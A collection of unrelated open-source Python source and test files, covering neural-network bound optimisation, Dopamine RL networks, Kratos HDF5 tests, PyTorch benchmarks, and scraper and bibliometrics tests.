def get_nonlinearity_activation_constructor(
cls: Callable[..., 'MinLagrangianNonConvexBound'],
index: Index,
act_type: str,
lb_fun: Callable[[Tensor], Tensor],
ub_fun: Callable[[Tensor], Tensor],
*inp: 'MinLagrangianNonConvexBound',
) -> Callable[..., 'MinLagrangianNonConvexBound']:
assert len(inp) == 1
assert act_type == 'Softplus' or act_type == 'ReLU'
inp = inp[0]
def lagrangian_varterms_fn(dvar: Tensor, lagrangian_dict: LagrangianDict):
# There is a linear term of dvar over the outputs.
lagrangian_dict[index].append(('Linear', lambda x: (-dvar*x)))
# For the inputs, there is a linear term through the upper bound:
pos_dvar = jnp.maximum(dvar, 0.)
neg_dvar = jnp.maximum(-dvar, 0.)
negdvar_dot_ub = lambda x: (-neg_dvar * ub_fun(x))
lagrangian_dict[inp.index].append(('Linear', negdvar_dot_ub))
# For the inputs, there is a ReLU term through the lower bound
lagrangian_dict[inp.index].append(
(act_type, lambda x: (pos_dvar * lb_fun(x))))
return functools.partial(cls, lagrangian_varterms_fn)
def requires_concretizing(self, consuming_primitive):
return self._concretized_bounds is None
def _optimize_lagrangian_terms(lagrangian_terms: List[LagrangianVarTerm],
lower_bound: Tensor,
upper_bound: Tensor) -> Tensor:
"""Minimize the part of the lagrangian corresponding to a given variable.
Args:
lagrangian_terms: A list of the terms involving that variable.
lower_bound: A tensor with the lower bound on the variable to optimize.
upper_bound: A tensor with the upper bound on the variable to optimize.
Returns:
opt_act: A tensor with the inputs minimizing the lagrangian terms for each
optimization target.
"""
act_term = None
# Get the total linear term
def linear_term(x):
out = 0
for term in lagrangian_terms:
if term[0] == 'Linear':
out += term[1](x).sum()
return out
# Identify the NonLinear term if there is one
for term in lagrangian_terms:
if term[0] in _lagrangian_opt_fns:
if act_term is not None:
raise ValueError('Variable involved in several activations.')
act_term = term
elif term[0] == 'Linear':
continue
else:
raise ValueError('Unexpected contribution.')
# Perform the minimization
lin_coeffs = jax.grad(linear_term)(lower_bound)
if act_term is None:
# This does not involve a non linearity, this is just a linear term
return jnp.where(lin_coeffs >= 0, lower_bound, upper_bound)
else:
return _lagrangian_opt_fns[act_term[0]](lin_coeffs, act_term[1],
lower_bound, upper_bound)
def _optimize_softplus_lagrangian(lin_coeffs: Tensor,
nonlin_term: Callable[[Tensor], Tensor],
lower_bound: Tensor,
upper_bound: Tensor) -> Tensor:
"""Compute the input minimizing a sum of a linear term and a softplus.
To minimize a * softplus(x) + b * x
Either cancel gradient is feasible:
a * (1 / (1 + exp(-x))) + b = 0
<=> a + b * (1 + exp(-x)) = 0
<=> - (a + b) / b = exp(-x)
<=> x = ln(- b / (a + b))
If b=0, this is just normal linear minimization.
If b / (a + b) > 0, that means there is no point where the gradient
cancels, which means that the minimum will be obtained at one of the
extremum. We can simply do linear minimization with the gradient.
Otherwise, the minimum is for x = ln(-b / (a+b)), clipped to valid bounds.
Args:
lin_coeffs: b in the previous equation.
nonlin_term: x -> a * softplus(x)
lower_bound: Lower bound on the input we're minimizing over.
upper_bound: Upper bound on the input we're minimizing over.
Returns:
opt_act: A tensor with the inputs minimizing the function specified.
"""
# Get the coefficients on the softplus
dummy_inp = jnp.ones_like(lower_bound)
softplus_coeffs = nonlin_term(dummy_inp) / jax.nn.softplus(dummy_inp)
grad_at_lb = lin_coeffs + softplus_coeffs * jax.nn.sigmoid(lower_bound)
# Check condition where we can disregard the 0-gradient solution
safe_denom = jnp.where(lin_coeffs + softplus_coeffs != 0,
lin_coeffs + softplus_coeffs, 1e-12)
inner_log = -lin_coeffs / safe_denom
safe_inner_log = jnp.where(inner_log > 0,
inner_log, jnp.ones_like(inner_log))
zero_grad_infeasible = jnp.any(
jnp.stack([(lin_coeffs + jnp.zeros_like(softplus_coeffs)) == 0,
lin_coeffs + softplus_coeffs == 0,
inner_log <= 0], axis=0), axis=0)
return jnp.where(zero_grad_infeasible,
jnp.where(grad_at_lb >= 0, lower_bound, upper_bound),
jnp.clip(jnp.log(safe_inner_log),
a_min=lower_bound, a_max=upper_bound))
def _optimize_relu_lagrangian(lin_coeffs: Tensor,
nonlin_term: Callable[[Tensor], Tensor],
lower_bound: Tensor,
upper_bound: Tensor) -> Tensor:
"""Compute the input minimizing a sum of a linear term and a ReLU.
To minimize a * relu(x) + b * x,
We know that the function is piecewise linear. We will stack the three
possible solutions along axis = 0 and then keep the minimum one.
Args:
lin_coeffs: b in the previous equation.
nonlin_term: x -> a * relu(x)
lower_bound: Lower bound on the input we're minimizing over.
upper_bound: Upper bound on the input we're minimizing over.
Returns:
opt_act: A tensor with the inputs minimizing the function specified.
"""
zero_inp = jnp.zeros_like(lower_bound)
possible_inps = jnp.stack([
lower_bound,
jnp.clip(zero_inp, a_min=lower_bound, a_max=upper_bound),
upper_bound], axis=0)
out_val = lin_coeffs * possible_inps + nonlin_term(possible_inps)
choice = out_val.argmin(axis=0)
return jnp.choose(choice, possible_inps, mode='clip')
_lagrangian_opt_fns = {
'ReLU': _optimize_relu_lagrangian,
'Softplus': _optimize_softplus_lagrangian
}
|
dopamine/jax/networks.py | wwjiang007/dopamine | 9,825 | 11156853 | # coding=utf-8
# Copyright 2018 The Dopamine Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Various networks for Jax Dopamine agents."""
import time
from typing import Tuple, Union
from dopamine.discrete_domains import atari_lib
from flax import linen as nn
import gin
import jax
import jax.numpy as jnp
import numpy as onp
gin.constant('jax_networks.CARTPOLE_OBSERVATION_DTYPE', jnp.float64)
gin.constant('jax_networks.CARTPOLE_MIN_VALS',
(-2.4, -5., -onp.pi/12., -onp.pi*2.))
gin.constant('jax_networks.CARTPOLE_MAX_VALS',
(2.4, 5., onp.pi/12., onp.pi*2.))
gin.constant('jax_networks.ACROBOT_OBSERVATION_DTYPE', jnp.float64)
gin.constant('jax_networks.ACROBOT_MIN_VALS',
(-1., -1., -1., -1., -5., -5.))
gin.constant('jax_networks.ACROBOT_MAX_VALS',
(1., 1., 1., 1., 5., 5.))
gin.constant('jax_networks.LUNAR_OBSERVATION_DTYPE', jnp.float64)
gin.constant('jax_networks.MOUNTAINCAR_OBSERVATION_DTYPE', jnp.float64)
gin.constant('jax_networks.MOUNTAINCAR_MIN_VALS', (-1.2, -0.07))
gin.constant('jax_networks.MOUNTAINCAR_MAX_VALS', (0.6, 0.07))
def preprocess_atari_inputs(x):
"""Input normalization for Atari 2600 input frames."""
return x.astype(jnp.float32) / 255.
identity_preprocess_fn = lambda x: x
### DQN Networks ###
@gin.configurable
class NatureDQNNetwork(nn.Module):
"""The convolutional network used to compute the agent's Q-values."""
num_actions: int
inputs_preprocessed: bool = False
@nn.compact
def __call__(self, x):
initializer = nn.initializers.xavier_uniform()
if not self.inputs_preprocessed:
x = preprocess_atari_inputs(x)
x = nn.Conv(features=32, kernel_size=(8, 8), strides=(4, 4),
kernel_init=initializer)(x)
x = nn.relu(x)
x = nn.Conv(features=64, kernel_size=(4, 4), strides=(2, 2),
kernel_init=initializer)(x)
x = nn.relu(x)
x = nn.Conv(features=64, kernel_size=(3, 3), strides=(1, 1),
kernel_init=initializer)(x)
x = nn.relu(x)
x = x.reshape((-1)) # flatten
x = nn.Dense(features=512, kernel_init=initializer)(x)
x = nn.relu(x)
q_values = nn.Dense(features=self.num_actions,
kernel_init=initializer)(x)
return atari_lib.DQNNetworkType(q_values)
@gin.configurable
class ClassicControlDQNNetwork(nn.Module):
"""Jax DQN network for classic control environments."""
num_actions: int
num_layers: int = 2
hidden_units: int = 512
min_vals: Union[None, Tuple[float, ...]] = None
max_vals: Union[None, Tuple[float, ...]] = None
inputs_preprocessed: bool = False
def setup(self):
if self.min_vals is not None:
assert self.max_vals is not None
self._min_vals = jnp.array(self.min_vals)
self._max_vals = jnp.array(self.max_vals)
initializer = nn.initializers.xavier_uniform()
self.layers = [
nn.Dense(features=self.hidden_units, kernel_init=initializer)
for _ in range(self.num_layers)]
self.final_layer = nn.Dense(features=self.num_actions,
kernel_init=initializer)
def __call__(self, x):
if not self.inputs_preprocessed:
x = x.astype(jnp.float32)
x = x.reshape((-1)) # flatten
if self.min_vals is not None:
x -= self._min_vals
x /= self._max_vals - self._min_vals
x = 2.0 * x - 1.0 # Rescale in range [-1, 1].
for layer in self.layers:
x = layer(x)
x = nn.relu(x)
q_values = self.final_layer(x)
return atari_lib.DQNNetworkType(q_values)
### Rainbow Networks ###
@gin.configurable
class RainbowNetwork(nn.Module):
"""Convolutional network used to compute the agent's return distributions."""
num_actions: int
num_atoms: int
inputs_preprocessed: bool = False
@nn.compact
def __call__(self, x, support):
initializer = nn.initializers.variance_scaling(
scale=1.0 / jnp.sqrt(3.0),
mode='fan_in',
distribution='uniform')
if not self.inputs_preprocessed:
x = preprocess_atari_inputs(x)
x = nn.Conv(features=32, kernel_size=(8, 8), strides=(4, 4),
kernel_init=initializer)(x)
x = nn.relu(x)
x = nn.Conv(features=64, kernel_size=(4, 4), strides=(2, 2),
kernel_init=initializer)(x)
x = nn.relu(x)
x = nn.Conv(features=64, kernel_size=(3, 3), strides=(1, 1),
kernel_init=initializer)(x)
x = nn.relu(x)
x = x.reshape((-1)) # flatten
x = nn.Dense(features=512, kernel_init=initializer)(x)
x = nn.relu(x)
x = nn.Dense(features=self.num_actions * self.num_atoms,
kernel_init=initializer)(x)
logits = x.reshape((self.num_actions, self.num_atoms))
probabilities = nn.softmax(logits)
q_values = jnp.sum(support * probabilities, axis=1)
return atari_lib.RainbowNetworkType(q_values, logits, probabilities)
@gin.configurable
class ClassicControlRainbowNetwork(nn.Module):
"""Jax Rainbow network for classic control environments."""
num_actions: int
num_atoms: int
num_layers: int = 2
hidden_units: int = 512
min_vals: Union[None, Tuple[float, ...]] = None
max_vals: Union[None, Tuple[float, ...]] = None
inputs_preprocessed: bool = False
def setup(self):
if self.min_vals is not None:
self._min_vals = jnp.array(self.min_vals)
self._max_vals = jnp.array(self.max_vals)
initializer = nn.initializers.xavier_uniform()
self.layers = [
nn.Dense(features=self.hidden_units, kernel_init=initializer)
for _ in range(self.num_layers)]
self.final_layer = nn.Dense(features=self.num_actions * self.num_atoms,
kernel_init=initializer)
def __call__(self, x, support):
if not self.inputs_preprocessed:
x = x.astype(jnp.float32)
x = x.reshape((-1)) # flatten
if self.min_vals is not None:
x -= self._min_vals
x /= self._max_vals - self._min_vals
x = 2.0 * x - 1.0 # Rescale in range [-1, 1].
for layer in self.layers:
x = layer(x)
x = nn.relu(x)
x = self.final_layer(x)
logits = x.reshape((self.num_actions, self.num_atoms))
probabilities = nn.softmax(logits)
q_values = jnp.sum(support * probabilities, axis=1)
return atari_lib.RainbowNetworkType(q_values, logits, probabilities)
### Implicit Quantile Networks ###
class ImplicitQuantileNetwork(nn.Module):
"""The Implicit Quantile Network (Dabney et al., 2018).."""
num_actions: int
quantile_embedding_dim: int
inputs_preprocessed: bool = False
@nn.compact
def __call__(self, x, num_quantiles, rng):
initializer = nn.initializers.variance_scaling(
scale=1.0 / jnp.sqrt(3.0),
mode='fan_in',
distribution='uniform')
if not self.inputs_preprocessed:
x = preprocess_atari_inputs(x)
x = nn.Conv(features=32, kernel_size=(8, 8), strides=(4, 4),
kernel_init=initializer)(x)
x = nn.relu(x)
x = nn.Conv(features=64, kernel_size=(4, 4), strides=(2, 2),
kernel_init=initializer)(x)
x = nn.relu(x)
x = nn.Conv(features=64, kernel_size=(3, 3), strides=(1, 1),
kernel_init=initializer)(x)
x = nn.relu(x)
x = x.reshape((-1)) # flatten
state_vector_length = x.shape[-1]
state_net_tiled = jnp.tile(x, [num_quantiles, 1])
quantiles_shape = [num_quantiles, 1]
quantiles = jax.random.uniform(rng, shape=quantiles_shape)
quantile_net = jnp.tile(quantiles, [1, self.quantile_embedding_dim])
quantile_net = (
jnp.arange(1, self.quantile_embedding_dim + 1, 1).astype(jnp.float32)
* onp.pi
* quantile_net)
quantile_net = jnp.cos(quantile_net)
quantile_net = nn.Dense(features=state_vector_length,
kernel_init=initializer)(quantile_net)
quantile_net = nn.relu(quantile_net)
x = state_net_tiled * quantile_net
x = nn.Dense(features=512, kernel_init=initializer)(x)
x = nn.relu(x)
quantile_values = nn.Dense(features=self.num_actions,
kernel_init=initializer)(x)
return atari_lib.ImplicitQuantileNetworkType(quantile_values, quantiles)
### Quantile Networks ###
@gin.configurable
class QuantileNetwork(nn.Module):
"""Convolutional network used to compute the agent's return quantiles."""
num_actions: int
num_atoms: int
inputs_preprocessed: bool = False
@nn.compact
def __call__(self, x):
initializer = nn.initializers.variance_scaling(
scale=1.0 / jnp.sqrt(3.0),
mode='fan_in',
distribution='uniform')
if not self.inputs_preprocessed:
x = preprocess_atari_inputs(x)
x = nn.Conv(features=32, kernel_size=(8, 8), strides=(4, 4),
kernel_init=initializer)(x)
x = nn.relu(x)
x = nn.Conv(features=64, kernel_size=(4, 4), strides=(2, 2),
kernel_init=initializer)(x)
x = nn.relu(x)
x = nn.Conv(features=64, kernel_size=(3, 3), strides=(1, 1),
kernel_init=initializer)(x)
x = nn.relu(x)
x = x.reshape((-1)) # flatten
x = nn.Dense(features=512, kernel_init=initializer)(x)
x = nn.relu(x)
x = nn.Dense(features=self.num_actions * self.num_atoms,
kernel_init=initializer)(x)
logits = x.reshape((self.num_actions, self.num_atoms))
probabilities = nn.softmax(logits)
q_values = jnp.mean(logits, axis=1)
return atari_lib.RainbowNetworkType(q_values, logits, probabilities)
### Noisy Nets for FullRainbowNetwork ###
@gin.configurable
class NoisyNetwork(nn.Module):
"""Noisy Network from Fortunato et al. (2018).
Attributes:
rng_key: jax.interpreters.xla.DeviceArray, key for JAX RNG.
eval_mode: bool, whether to turn off noise during evaluation.
"""
rng_key: jax.interpreters.xla.DeviceArray
eval_mode: bool = False
@staticmethod
def sample_noise(key, shape):
return jax.random.normal(key, shape)
@staticmethod
def f(x):
# See (10) and (11) in Fortunato et al. (2018).
return jnp.multiply(jnp.sign(x), jnp.power(jnp.abs(x), 0.5))
@nn.compact
def __call__(self, x, features, bias=True, kernel_init=None):
def mu_init(key, shape):
# Initialization of mean noise parameters (Section 3.2)
low = -1 / jnp.power(x.shape[0], 0.5)
high = 1 / jnp.power(x.shape[0], 0.5)
return jax.random.uniform(key, minval=low, maxval=high, shape=shape)
def sigma_init(key, shape, dtype=jnp.float32): # pylint: disable=unused-argument
# Initialization of sigma noise parameters (Section 3.2)
return jnp.ones(shape, dtype) * (0.1 / onp.sqrt(x.shape[0]))
if self.eval_mode:
# Turn off noise during evaluation
w_epsilon = onp.zeros(shape=(x.shape[0], features), dtype=onp.float32)
b_epsilon = onp.zeros(shape=(features,), dtype=onp.float32)
else:
# Factored gaussian noise in (10) and (11) in Fortunato et al. (2018).
p = NoisyNetwork.sample_noise(self.rng_key, [x.shape[0], 1])
q = NoisyNetwork.sample_noise(self.rng_key, [1, features])
f_p = NoisyNetwork.f(p)
f_q = NoisyNetwork.f(q)
w_epsilon = f_p * f_q
b_epsilon = jnp.squeeze(f_q)
# See (8) and (9) in Fortunato et al. (2018) for output computation.
w_mu = self.param('kernel_mu', mu_init, (x.shape[0], features))
w_sigma = self.param('kernel_sigma', sigma_init, (x.shape[0], features))
w = w_mu + jnp.multiply(w_sigma, w_epsilon)
ret = jnp.matmul(x, w)
b_mu = self.param('bias_mu', mu_init, (features,))
b_sigma = self.param('bias_sigma', sigma_init, (features,))
b = b_mu + jnp.multiply(b_sigma, b_epsilon)
return jnp.where(bias, ret + b, ret)
### FullRainbowNetwork ###
def feature_layer(key, noisy, eval_mode=False):
"""Network feature layer depending on whether noisy_nets are used on or not."""
def noisy_net(x, features):
return NoisyNetwork(rng_key=key, eval_mode=eval_mode)(x, features)
def dense_net(x, features):
return nn.Dense(features, kernel_init=nn.initializers.xavier_uniform())(x)
return noisy_net if noisy else dense_net
@gin.configurable
class FullRainbowNetwork(nn.Module):
"""Jax Rainbow network for Full Rainbow.
Attributes:
num_actions: int, number of actions the agent can take at any state.
num_atoms: int, the number of buckets of the value function distribution.
noisy: bool, Whether to use noisy networks.
dueling: bool, Whether to use dueling network architecture.
distributional: bool, whether to use distributional RL.
"""
num_actions: int
num_atoms: int
noisy: bool = True
dueling: bool = True
distributional: bool = True
inputs_preprocessed: bool = False
@nn.compact
def __call__(self, x, support, eval_mode=False, key=None):
# Generate a random number generation key if not provided
if key is None:
key = jax.random.PRNGKey(int(time.time() * 1e6))
if not self.inputs_preprocessed:
x = preprocess_atari_inputs(x)
hidden_sizes = [32, 64, 64]
kernel_sizes = [8, 4, 3]
stride_sizes = [4, 2, 1]
for hidden_size, kernel_size, stride_size in zip(hidden_sizes, kernel_sizes,
stride_sizes):
x = nn.Conv(
features=hidden_size,
kernel_size=(kernel_size, kernel_size),
strides=(stride_size, stride_size),
kernel_init=nn.initializers.xavier_uniform())(x)
x = nn.relu(x)
x = x.reshape((-1)) # flatten
net = feature_layer(key, self.noisy, eval_mode=eval_mode)
x = net(x, features=512) # Single hidden layer of size 512
x = nn.relu(x)
if self.dueling:
adv = net(x, features=self.num_actions * self.num_atoms)
value = net(x, features=self.num_atoms)
adv = adv.reshape((self.num_actions, self.num_atoms))
value = value.reshape((1, self.num_atoms))
logits = value + (adv - (jnp.mean(adv, axis=0, keepdims=True)))
else:
x = net(x, features=self.num_actions * self.num_atoms)
logits = x.reshape((self.num_actions, self.num_atoms))
if self.distributional:
probabilities = nn.softmax(logits)
q_values = jnp.sum(support * probabilities, axis=1)
return atari_lib.RainbowNetworkType(q_values, logits, probabilities)
q_values = jnp.sum(logits, axis=1) # Sum over all the num_atoms
return atari_lib.DQNNetworkType(q_values)
|
applications/HDF5Application/tests/test_hdf5_core_mpi.py | lkusch/Kratos | 778 | 11156857 | <filename>applications/HDF5Application/tests/test_hdf5_core_mpi.py<gh_stars>100-1000
import KratosMultiphysics
import KratosMultiphysics.HDF5Application as KratosHDF5
from KratosMultiphysics.HDF5Application import core
from KratosMultiphysics.HDF5Application.core import operations, file_io
import KratosMultiphysics.KratosUnittest as KratosUnittest
from KratosMultiphysics.HDF5Application.core.utils import ParametersWrapper
from unittest.mock import patch, MagicMock
import test_hdf5_core
class TestFileIO(KratosUnittest.TestCase):
def test_HDF5ParallelFileIO_Creation(self):
io = file_io._HDF5ParallelFileIO()
test_hdf5_core.TestFileIO._BuildTestFileIOObject(io)
obj = io.Get('kratos.h5')
self.assertIsInstance(obj, KratosHDF5.HDF5FileParallel)
class TestOperations(KratosUnittest.TestCase):
def test_PartitionedModelPartOutput(self):
settings = ParametersWrapper()
settings['operation_type'] = 'partitioned_model_part_output'
partitioned_model_part_output = operations.Create(settings)
self.assertTrue(settings.Has('operation_type'))
self.assertTrue(settings.Has('prefix'))
with patch('KratosMultiphysics.HDF5Application.core.operations.KratosHDF5.HDF5PartitionedModelPartIO') as p:
partitioned_model_part_io = p.return_value
model_part = test_hdf5_core._SurrogateModelPart()
hdf5_file = MagicMock(spec=KratosHDF5.HDF5FileParallel)
partitioned_model_part_output(model_part, hdf5_file)
p.assert_called_once_with(hdf5_file, '/ModelData')
partitioned_model_part_io.WriteModelPart.assert_called_once_with(
model_part)
def test_PartitionedModelPartOutput_NonTerminalPrefix(self):
settings = ParametersWrapper('''
{
"operation_type": "partitioned_model_part_output",
"prefix": "/ModelData/<model_part_name>/<time>",
"time_format": "0.2f"
}
''')
partitioned_model_part_output = operations.Create(settings)
with patch('KratosMultiphysics.HDF5Application.core.operations.KratosHDF5.HDF5PartitionedModelPartIO', autospec=True) as p:
model_part = test_hdf5_core._SurrogateModelPart()
hdf5_file = MagicMock(spec=KratosHDF5.HDF5FileParallel)
partitioned_model_part_output(model_part, hdf5_file)
args, _ = p.call_args
self.assertEqual(args[1], '/ModelData/model_part/1.23')
if __name__ == "__main__":
KratosUnittest.main()
|
benchmarks/operator_benchmark/pt/matrix_mult_test.py | Hacky-DH/pytorch | 60,067 | 11156858 | import operator_benchmark as op_bench
import torch
"""
Microbenchmarks for batch matrix mult with einsum and torch.bmm.
"""
batch_mm_configs_short = op_bench.config_list(
attr_names=["B", "M", "N", "K"],
attrs=[
[4, 5, 3, 2],
[32, 25, 20, 30],
[128, 100, 120, 110],
],
cross_product_configs={
'device': ['cpu', 'cuda'],
},
tags=["short"],
)
batch_mm_configs_long = op_bench.config_list(
attr_names=["B", "M", "N", "K"],
attrs=[
[128, 256, 128, 256],
[512, 1024, 1024, 512],
],
cross_product_configs={
'device': ['cpu', 'cuda'],
},
tags=["long"],
)
batch_mm_op_list = op_bench.op_list(
attr_names=['op_name', 'op_func'],
attrs=[
['einsum_bmm', torch.einsum],
['bmm', torch.bmm],
],
)
class BatchMatrixMultBenchmark(op_bench.TorchBenchmarkBase):
def init(self, B, M, N, K, device, op_func):
self.inputs = {
"input_one": torch.rand(B, M, N, device=device),
"input_two": torch.rand(B, N, K, device=device)
}
self.op_func = op_func
def forward(self, input_one, input_two):
if self.op_func.__name__ == "einsum":
return torch.einsum('bij,bjk->bik', input_one, input_two)
else:
return torch.bmm(input_one, input_two)
"""
Microbenchmarks for element-wise matrix mult with einsum and torch.mul.
"""
batch_elementwise_configs_short = op_bench.config_list(
attr_names=["B", "M", "N"],
attrs=[
[4, 5, 3],
[32, 25, 20],
[100, 90, 110],
],
cross_product_configs={
'device': ['cpu', 'cuda'],
},
tags=["short"],
)
batch_elementwise_configs_long = op_bench.cross_product_configs(
B=[128, 512, 1024],
M=[128, 512, 1024],
N=[128, 512, 1024],
device=['cpu', 'cuda'],
tags=['long']
)
batch_elementwise_op_list = op_bench.op_list(
attr_names=['op_name', 'op_func'],
attrs=[
['einsum_elementwise', torch.einsum],
['mul', torch.mul],
],
)
class BatchElementWiseBenchmark(op_bench.TorchBenchmarkBase):
def init(self, B, M, N, device, op_func):
self.inputs = {
"input_one": torch.rand(B, M, N, device=device),
"input_two": torch.rand(B, M, N, device=device)
}
self.op_func = op_func
def forward(self, input_one, input_two):
if self.op_func.__name__ == "einsum":
return torch.einsum('bij,bij->bij', input_one, input_two)
else:
return torch.mul(input_one, input_two)
op_bench.generate_pt_tests_from_op_list(
batch_mm_op_list,
batch_mm_configs_short + batch_mm_configs_long,
BatchMatrixMultBenchmark,
)
op_bench.generate_pt_tests_from_op_list(
batch_elementwise_op_list,
batch_elementwise_configs_short + batch_elementwise_configs_long,
BatchElementWiseBenchmark,
)
if __name__ == "__main__":
op_bench.benchmark_runner.main()
|
pybliometrics/scopus/tests/test_SubjectClassifications.py | herreio/pybliometrics | 186 | 11156866 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Tests for `scopus.SubjectClassifications` module."""
from nose.tools import assert_equal, assert_true
from pybliometrics.scopus import SubjectClassifications
# Search by words in subject description
sub1 = SubjectClassifications({'description': 'Physics'}, refresh=30)
# Search by subject code
sub2 = SubjectClassifications({'code': '2613'}, refresh=30)
# Search by words in subject detail
sub3 = SubjectClassifications({'detail': 'Processes'}, refresh=30)
# Search by subject abbreviation
sub4 = SubjectClassifications({'abbrev': 'MATH'}, refresh=30)
# Search by multiple criteria
sub5 = SubjectClassifications({'description': 'Engineering', 'detail': 'Fluid'}, refresh=30)
# Search by multiple criteria, subset returned fields
sub6 = SubjectClassifications({'detail': 'Analysis', 'description': 'Mathematics'},
fields=['description', 'detail'], refresh=30)
def test_results_desc():
assert_true(len(sub1.results) > 0)
assert_true(all(['Physics' in res.description for res in sub1.results]))
def test_results_code():
assert_equal(len(sub2.results), 1)
assert_equal(sub2.results[0].code, '2613')
def test_results_detail():
assert_true(len(sub3.results) > 0)
assert_true(all(['Processes' in res.detail for res in sub3.results]))
def test_results_abbrev():
assert_true(len(sub4.results) > 0)
assert_true(all(['MATH' in res.abbrev for res in sub4.results]))
def test_results_multi():
assert_true(len(sub5.results) > 0)
assert_true(all(['Engineering' in res.description for res in sub5.results]))
assert_true(all(['Fluid' in res.detail for res in sub5.results]))
def test_results_fields():
assert_true(len(sub6.results) > 0)
assert_true(all(['Mathematics' in res.description for res in sub6.results]))
assert_true(all(['Analysis' in res.detail for res in sub6.results]))
assert_true(all([set(res._fields) == set(['description', 'detail']) for res in sub6.results]))
|
tests/e2e_tests/test_permissions.py | shikher-chhawchharia/google-play-scraper | 325 | 11156872 | from unittest import TestCase
from google_play_scraper.features.permissions import permissions
class TestPermission(TestCase):
def test_reply_data_all_types(self):
result = permissions("com.spotify.music", lang="en", country="us")
self.assertDictEqual(
{
"Device ID & call information": ["read phone status and identity"],
"Identity": ["add or remove accounts", "find accounts on the device"],
"Storage": [
"modify or delete the contents of your USB storage",
"read the contents of your USB storage",
],
"Phone": ["read phone status and identity"],
"Microphone": ["record audio"],
"Wi-Fi connection information": ["view Wi-Fi connections"],
"Contacts": ["find accounts on the device"],
"Camera": ["take pictures and videos"],
"Photos/Media/Files": [
"modify or delete the contents of your USB storage",
"read the contents of your USB storage",
],
"Other": [
"access Bluetooth settings",
"allow Wi-Fi Multicast reception",
"change network connectivity",
"change your audio settings",
"control Near Field Communication",
"control vibration",
"full network access",
"install shortcuts",
"pair with Bluetooth devices",
"prevent device from sleeping",
"run at startup",
"send sticky broadcast",
"use accounts on the device",
"view network connections",
],
"Uncategorized": ["receive data from Internet"],
},
result,
)
def test_reply_data_only_other_type(self):
result = permissions("example.matharithmetics", lang="en", country="us")
self.assertDictEqual(
{
"Wi-Fi connection information": ["view Wi-Fi connections"],
"Photos/Media/Files": [
"modify or delete the contents of your USB storage",
"read the contents of your USB storage",
],
"Storage": [
"modify or delete the contents of your USB storage",
"read the contents of your USB storage",
],
"Other": [
"control vibration",
"full network access",
"run at startup",
"view network connections",
],
},
result,
)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.